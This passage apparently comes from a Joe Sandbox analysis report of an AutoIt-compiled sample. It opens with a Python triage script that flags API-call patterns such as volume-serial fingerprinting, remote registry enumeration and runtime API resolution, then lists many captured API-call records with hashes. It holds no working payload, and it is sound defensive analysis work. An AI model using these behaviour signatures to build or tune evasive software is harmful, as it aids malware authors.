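     lambda r: "CreatePipe" in r.api_names()
               and any(c.api == "CreateFileW" and c.args[:1] == ["nul"] for c in r.calls)),
    ("volume serial read with critical-error dialogs suppressed (host fingerprint)",
     lambda r: {"SetErrorMode", "GetVolumeInformationW"} <= r.api_names()),
    ("registry connection plus key enumeration",
     lambda r: {"RegConnectRegistryW", "RegEnumKeyExW"} <= r.api_names()),
    ("runtime API resolution via LoadLibraryW/GetProcAddress",
     lambda r: {"LoadLibraryW", "GetProcAddress"} <= r.api_names()),
]

def classify(rec):
    return [label for label, pred in RULES if pred(rec)]

def triage(text):
    """(API ID, flags) for every record that triggers at least one rule."""
    return [(r.meta.get("API ID", ""), flags)
            for r in parse_records(text) if (flags := classify(r))]

# Abridged copy of three records from this report (most metadata lines trimmed).
SAMPLE = """\
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00E3705E
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E37091
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E370DD
• Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• Instruction Fuzzy Hash: 48217FB4604309ABDF349F39D809A9A7BE8AF44724F205A19F8E0F72D0D7719840CB50
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00E3AEBF
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E3AF13
• __swprintf.LIBCMT ref: 00E3AF2C
• SetErrorMode.KERNEL32(00000000,00000001,00000000,00E5F910), ref: 00E3AF6A
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• Instruction Fuzzy Hash: 1E217470600209AFCB10EF65C985DAEBBB8EF49704B014069F909EB351DB31EE45CB71
APIs
  • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E50388
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E5040E
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• Instruction Fuzzy Hash: 7D513971208204AFD704EF64DC91E6EB7E8FF84315F04996EF995A7291DB31E908CB62
"""

if __name__ == "__main__":
    for api_id, flags in triage(SAMPLE):
        print(api_id, "->", "; ".join(flags))
```

Running the file prints one line per flagged record, keyed by the report's own "API ID" field. The Joe Sandbox "API String ID" and fuzzy-hash fields are carried through in `meta` untouched; the script does not recompute them, since their hashing scheme is not documented on this page.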
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00DD2357
                                          • ScreenToClient.USER32(00E967B0,?), ref: 00DD2374
                                          • GetAsyncKeyState.USER32(00000001), ref: 00DD2399
                                          • GetAsyncKeyState.USER32(00000002), ref: 00DD23A7
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E2695D
                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00E269A9
                                          • TranslateMessage.USER32(?), ref: 00E269D2
                                          • DispatchMessageW.USER32(?), ref: 00E269DC
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E269EB
                                          Similarity
                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                          • String ID:
                                          • API String ID: 2108273632-0
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00E28F12
                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00E28FBC
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E28FC4
                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00E28FD2
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E28FDA
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00E2B6C7
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E2B6E4
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E2B71C
                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E2B742
                                          • _wcsstr.LIBCMT ref: 00E2B74C
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                          • String ID:
                                          • API String ID: 3902887630-0
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E5B44C
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E5B471
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E5B489
                                          • GetSystemMetrics.USER32(00000004), ref: 00E5B4B2
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E41184,00000000), ref: 00E5B4D0
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          APIs
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E29802
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E29834
                                          • __itow.LIBCMT ref: 00E2984C
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E29874
                                          • __itow.LIBCMT ref: 00E29885
                                          Similarity
                                          • API ID: MessageSend$__itow$_memmove
                                          • String ID:
                                          • API String ID: 2983881199-0
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DD134D
                                          • SelectObject.GDI32(?,00000000), ref: 00DD135C
                                          • BeginPath.GDI32(?), ref: 00DD1373
                                          • SelectObject.GDI32(?,00000000), ref: 00DD139C
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00E34D5C
                                          • __beginthreadex.LIBCMT ref: 00E34D7A
                                          • MessageBoxW.USER32(?,?,?,?), ref: 00E34D8F
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E34DA5
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E34DAC
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                          • String ID:
                                          • API String ID: 3824534824-0
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E28766
                                          • GetLastError.KERNEL32(?,00E2822A,?,?,?), ref: 00E28770
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00E2822A,?,?,?), ref: 00E2877F
                                          • RtlAllocateHeap.NTDLL(00000000,?,00E2822A), ref: 00E28786
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E2879D
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                          • String ID:
                                          • API String ID: 883493501-0
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E35502
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E35510
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E35518
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E35522
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E3555E
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: 20878b66851f24c585b87606b0a06229fd17d725f97a0d2d5241e137d4fc747a
                                          • Instruction ID: cb4d1a5f117aa51403bbdabb5ec9c2d3579ffd02d5c51bef7118a2db458d9d2c
                                          • Opcode Fuzzy Hash: 20878b66851f24c585b87606b0a06229fd17d725f97a0d2d5241e137d4fc747a
                                          • Instruction Fuzzy Hash: 31016D36C01A29EBCF04EFE9E94C5EDBF79FB09702F011856E802B2240DB30A654C7A1
                                          APIs
                                          • CLSIDFromProgID.COMBASE ref: 00E2766F
                                          • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00E2768A
                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E2758C,80070057,?,?), ref: 00E27698
                                          • CoTaskMemFree.COMBASE(00000000), ref: 00E276A8
                                          • CLSIDFromString.COMBASE(?,?), ref: 00E276B4
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: ace944770c8ed2f53923247edb25d1cdb18ec162ad4e1aa527f28f93b5bedc78
                                          • Instruction ID: 055daa7c702757df8a4e6077abc186397d10dc48ef97306e75c115b8ce93b1f8
                                          • Opcode Fuzzy Hash: ace944770c8ed2f53923247edb25d1cdb18ec162ad4e1aa527f28f93b5bedc78
                                          • Instruction Fuzzy Hash: 8B01D4B2601724BFDB145F19EC04BAA7FADEB44752F101028FD45F2211EB31DD0187A0
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E28608
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E28612
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E28621
                                          • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00E28628
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E2863E
                                          Similarity
                                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                                          • String ID:
                                          • API String ID: 47921759-0
                                          • Opcode ID: 97b677a4cdaa08a1b3f03bc3147bb7117b19851cf1b85934d93820c47a756c5e
                                          • Instruction ID: 24757c492089d8fa5a4ba5955fb87dc79bc61defd74e932cc2e919f706fe836e
                                          • Opcode Fuzzy Hash: 97b677a4cdaa08a1b3f03bc3147bb7117b19851cf1b85934d93820c47a756c5e
                                          • Instruction Fuzzy Hash: 02F0C234202315AFEB200FA6ED8DE6B3BACEF89759B001825F905E3190CF70DC45DA60
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E28669
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E28673
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E28682
                                          • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00E28689
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E2869F
                                          Similarity
                                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                                          • String ID:
                                          • API String ID: 47921759-0
                                          • Opcode ID: 309825ec0c0ed946c3c265332192c6e4fbc882ccec85b1904bbd414e5301857a
                                          • Instruction ID: 54d9001bf880e716c6e5ed339d031eae93d3aa427277b32a13fef51c479e73eb
                                          • Opcode Fuzzy Hash: 309825ec0c0ed946c3c265332192c6e4fbc882ccec85b1904bbd414e5301857a
                                          • Instruction Fuzzy Hash: F2F0C270202314AFEB111FA6EC8CE6B3BADEF8975AB140435F905E3190CB70DC04DA60
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E2C6BA
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E2C6D1
                                          • MessageBeep.USER32(00000000), ref: 00E2C6E9
                                          • KillTimer.USER32(?,0000040A), ref: 00E2C705
                                          • EndDialog.USER32(?,00000001), ref: 00E2C71F
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: 78e98a2e19c3c19f0bd3e74e8de7bf9a592179097c149ec4a59a904fc248b9c3
                                          • Instruction ID: 1d6b68a63550681ae0584c46f7e2f799152c8e6c28dce0643825395bcbf553a2
                                          • Opcode Fuzzy Hash: 78e98a2e19c3c19f0bd3e74e8de7bf9a592179097c149ec4a59a904fc248b9c3
                                          • Instruction Fuzzy Hash: 21018B305007149BEB256B21ED5EF9677B8FF04706F10156AF542B14E1DBF0A9588F91
                                          APIs
                                          • EndPath.GDI32(?), ref: 00DD13BF
                                          • StrokeAndFillPath.GDI32(?,?,00E0BAD8,00000000,?), ref: 00DD13DB
                                          • SelectObject.GDI32(?,00000000), ref: 00DD13EE
                                          • DeleteObject.GDI32 ref: 00DD1401
                                          • StrokePath.GDI32(?), ref: 00DD141C
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: d8d66b1f9fe40c9c4d39b96936aead66f739088627169cc43a3831879fe4a765
                                          • Instruction ID: ddc6b85c60976c06f7e08eabc0b65f0278e52875e0daff28534eb9efb3a37456
                                          • Opcode Fuzzy Hash: d8d66b1f9fe40c9c4d39b96936aead66f739088627169cc43a3831879fe4a765
                                          • Instruction Fuzzy Hash: 62F0C434004708EFDB295F67ED0C7583BA4EB01326F088227E569A91F1C7318999DF60
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E28E7F
                                          • CloseHandle.KERNEL32(?), ref: 00E28E94
                                          • CloseHandle.KERNEL32(?), ref: 00E28E9C
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E28EA5
                                          • HeapFree.KERNEL32(00000000), ref: 00E28EAC
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                          • String ID:
                                          • API String ID: 3751786701-0
                                          • Opcode ID: acff552435243b4a99c02aaaf46306ebb388aefeb9c48fc903630056884a6c20
                                          • Instruction ID: 2acc54d25ca0cedd72137da8611e8b7c77868db7498a46dde13643dc30bc44e0
                                          • Opcode Fuzzy Hash: acff552435243b4a99c02aaaf46306ebb388aefeb9c48fc903630056884a6c20
                                          • Instruction Fuzzy Hash: D5E0C236005601FFDA052FE2ED0C90ABB69FB89323B108A31F219A1471CB32A428DB50
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 00E3C69D
                                          • CoCreateInstance.COMBASE(00E62D6C,00000000,00000001,00E62BDC,?), ref: 00E3C6B5
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                          • CoUninitialize.COMBASE ref: 00E3C922
                                          Strings
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          • Opcode ID: ab9db9cf58de11660a622e59702ba22801fa960b8cb37cef75fae9f703276e30
                                          • Instruction ID: 338cda9d81025c777e24d22c35f189f1803a2a31452877e5ed10d48c942a49e9
                                          • Opcode Fuzzy Hash: ab9db9cf58de11660a622e59702ba22801fa960b8cb37cef75fae9f703276e30
                                          • Instruction Fuzzy Hash: 08A13A71108305AFD300EF64D891EABB7ECEF94304F00495DF196972A2EB71EA09CB62
                                          APIs
                                            • Part of subcall function 00DF0FF6: std::exception::exception.LIBCMT ref: 00DF102C
                                            • Part of subcall function 00DF0FF6: __CxxThrowException@8.LIBCMT ref: 00DF1041
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00DD7BB1: _memmove.LIBCMT ref: 00DD7C0B
                                          • __swprintf.LIBCMT ref: 00DE302D
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00DE2EC6
                                          Similarity
                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          • Opcode ID: 74b110b478a0ff49bb2ad8fa3eba0e987779998605031c71b0fd199da058deea
                                          • Instruction ID: eabd8772e020ea44d933d41bf858938fa4757fc171be6401de29e91aa06fc90b
                                          • Opcode Fuzzy Hash: 74b110b478a0ff49bb2ad8fa3eba0e987779998605031c71b0fd199da058deea
                                          • Instruction Fuzzy Hash: F0917F711087419FC728FF24D895C7EB7A8EF85740F05495EF485972A1EA20EE45CB72
                                          APIs
                                            • Part of subcall function 00DD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD48A1,?,?,00DD37C0,?), ref: 00DD48CE
                                          • CoInitialize.OLE32(00000000), ref: 00E3BC26
                                          • CoCreateInstance.COMBASE(00E62D6C,00000000,00000001,00E62BDC,?), ref: 00E3BC3F
                                          • CoUninitialize.COMBASE ref: 00E3BC5C
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          Strings
                                          Similarity
                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                          • String ID: .lnk
                                          • API String ID: 2126378814-24824748
                                          • Opcode ID: 3c18ed43e7c6d2a4f14e24cb110db7167401908400fe402fd5e97ff0992f1843
                                          • Instruction ID: 09183d295924be4a6d9670d2cac2cc11b5d870846983bf259219fa7ed52134d9
                                          • Opcode Fuzzy Hash: 3c18ed43e7c6d2a4f14e24cb110db7167401908400fe402fd5e97ff0992f1843
                                          • Instruction Fuzzy Hash: 11A17A752043019FCB14DF24C494D6ABBE5FF88314F049999F99AAB3A1CB32ED45CBA1
                                          APIs
                                          • OleSetContainedObject.OLE32(?,00000001), ref: 00E2B981
                                          Strings
                                          Similarity
                                          • API ID: ContainedObject
                                          • String ID: AutoIt3GUI$Container$%
                                          • API String ID: 3565006973-1286912533
                                          • Opcode ID: a5a136bdf0f0af23359bd6901b892044ec16c5f492da8c4304bc130218f16db0
                                          • Instruction ID: e3c3668a2e192bb91a882a1a6395fdb28b08423312b0c7122bd6769a1806bb28
                                          • Opcode Fuzzy Hash: a5a136bdf0f0af23359bd6901b892044ec16c5f492da8c4304bc130218f16db0
                                          • Instruction Fuzzy Hash: C8915C706007119FDB28DF24D885A6ABBF8FF48714F14956EF94AEB291DB71E840CB60
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00DF52DD
                                            • Part of subcall function 00E00340: __87except.LIBCMT ref: 00E0037B
                                          Strings
                                          Similarity
                                          • API ID: ErrorHandling__87except__start
                                          • String ID: pow
                                          • API String ID: 2905807303-2276729525
                                          • Opcode ID: e5b3285af888b39b812ff3b3aef4cdde9db6e0f8edd2a7a3d7172dc7789edd12
                                          • Instruction ID: 1b7b9c95d5602215881ce9e676cdda683afc015f92232dcd63b2b1e44581fd7e
                                          • Opcode Fuzzy Hash: e5b3285af888b39b812ff3b3aef4cdde9db6e0f8edd2a7a3d7172dc7789edd12
                                          • Instruction Fuzzy Hash: A651AF21E0CA098BC7117718E90137E6BD0DB00354F29DE59E7E5621EDEF74CCD89A5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$+
                                          • API String ID: 0-2552117581
                                          • Opcode ID: 2e98f77f3ac4f3610e7275af527ea04e98f1a43811966e16686f6c05da6f2fdf
                                          • Instruction ID: bc52593720654e24a68a40279411c1abaf631bce0c77969197011d6fc78a9e01
                                          • Opcode Fuzzy Hash: 2e98f77f3ac4f3610e7275af527ea04e98f1a43811966e16686f6c05da6f2fdf
                                          • Instruction Fuzzy Hash: D651567610466ACFDF15DF28D4886FE7BA4EF15310F188056EC91AB2A1D7309D82C770
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E576D0
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E576E4
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E57708
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: bf46cf5c6d746b5f3f8ba830ae7f6b210f548b50145f9e0026cbd3e07da99ccb
                                          • Instruction ID: 715c6f68975221106adf8cb1fe4d4d86f152775bc716d82951cc5e4b2f3c749f
                                          • Opcode Fuzzy Hash: bf46cf5c6d746b5f3f8ba830ae7f6b210f548b50145f9e0026cbd3e07da99ccb
                                          • Instruction Fuzzy Hash: D721F132500218BFDF15CFA4DC42FEA3BA9EF48724F101615FE557B1D0D6B1A8648BA0
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E56FAA
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E56FBA
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E56FDF
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: cd98091f650d8793b0b943054f01df7db811b6e84692d297b7253f292f4089e0
                                          • Instruction ID: 381297362f98a27cc8db82f4e1f3d81b26923f23966b903c986064dfc62396bc
                                          • Opcode Fuzzy Hash: cd98091f650d8793b0b943054f01df7db811b6e84692d297b7253f292f4089e0
                                          • Instruction Fuzzy Hash: 0521F232B10218BFDF118F54DC84EAB3BAAEF89765F419525F904AB1A0C671AC158BA0
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E579E1
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E579F6
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E57A03
                                          Strings
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: 8ebefc7ef290af1159c8e3bd226ada6a8b6eb849cf1185b1e06175395af1a059
                                          • Instruction ID: ee9e25a012bfc6e28b9428a8e5509f5cf099b0319a9edc9949f2b117d24a6e52
                                          • Opcode Fuzzy Hash: 8ebefc7ef290af1159c8e3bd226ada6a8b6eb849cf1185b1e06175395af1a059
                                          • Instruction Fuzzy Hash: C611C432244208BAEF149E61DC05FDB37A9EF89769F021919FA45B6091D2719815CB60
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00E11D88,?), ref: 00E4C312
                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E4C324
                                          Strings
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                          • API String ID: 2574300362-1816364905
                                          • Opcode ID: 9f7961137897519d38be073f0b32c3cea47baef2a1bd6f299b8842970b607928
                                          • Instruction ID: 971b38448b39b8e5a2481c436149316656e5beedc614f12726ac950a119fe84a
                                          • Opcode Fuzzy Hash: 9f7961137897519d38be073f0b32c3cea47baef2a1bd6f299b8842970b607928
                                          • Instruction Fuzzy Hash: C6E0C270202703CFCB605F26E804A4676D4EF0870AF90E879E889F32A0E770E880CB60
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DD4C2E), ref: 00DD4CA3
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DD4CB5
                                          Strings
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: 31c50f367076f06b5b63d8e9cbc74434ab2a4eb442ac0c008e03f9a46cf4a3f2
                                          • Instruction ID: 88653f86a3813bab55d001b1b3bd747050372d4ef09a49f602266c241df44bd5
                                          • Opcode Fuzzy Hash: 31c50f367076f06b5b63d8e9cbc74434ab2a4eb442ac0c008e03f9a46cf4a3f2
                                          • Instruction Fuzzy Hash: 5BD01730521B23CFD7209F36DA18A0676E9AF05792B158C3AD886E6250EA70E884CA61
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DD4CE1,?), ref: 00DD4DA2
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DD4DB4
                                          Strings
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-1355242751
                                          • Opcode ID: 96b3ff49d973a59ae8648f712868fac96fd3a2ad3b2bd49c6eb27e12ddd46afa
                                          • Instruction ID: 01bcc600034df9389733ab9a037ca1a9f1422ef23915108600d8d06e641ae3d9
                                          • Opcode Fuzzy Hash: 96b3ff49d973a59ae8648f712868fac96fd3a2ad3b2bd49c6eb27e12ddd46afa
                                          • Instruction Fuzzy Hash: 19D05E31550B13CFD720AF32D908A4676E5AF05366F25CC3ED8DAE6250EB70E884CB60
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DD4D2E,?,00DD4F4F,?,00E962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DD4D6F
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DD4D81
                                          Strings
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-3689287502
                                          • Opcode ID: 578e54a3907dc19acee9a2508feba83dc6c5205997db2db2a5d366e9585c57f1
                                          • Instruction ID: 6e0202cb8f8e6dd3958c196112ed035933273014ff227467eb9b2307c5c4943c
                                          • Opcode Fuzzy Hash: 578e54a3907dc19acee9a2508feba83dc6c5205997db2db2a5d366e9585c57f1
                                          • Instruction Fuzzy Hash: C2D01730510B13CFD720AF32D90861676E9AF15352B298C3AD8DAE6250E670D884CA60
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00E512C1), ref: 00E51080
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E51092
                                          Strings
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: ac53d157ec2a83868bf48e9989ceaa866e42992e8c1a411c05b86d0aefe52852
                                          • Instruction ID: 144bcba96d38a08bd5561643bcfe5200d29edcd559114270e9a134caefc92c7c
                                          • Opcode Fuzzy Hash: ac53d157ec2a83868bf48e9989ceaa866e42992e8c1a411c05b86d0aefe52852
                                          • Instruction Fuzzy Hash: ECD01230510712CFD7206F35D95861676E4AF05396B119C79E8CDF71A1D770C4C4C750
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E49009,?,00E5F910), ref: 00E49403
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E49415
                                          Strings
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetModuleHandleExW$kernel32.dll
                                          • API String ID: 2574300362-199464113
                                          • Opcode ID: 2810c1fa84008d4ef0653979dadaf8aef625a645fc16e9102b611d1569a76b21
                                          • Instruction ID: 3fff9ff9c7a79132d8c9552d32aac6f9edf91fe9d903311c3c23af9656f6ab33
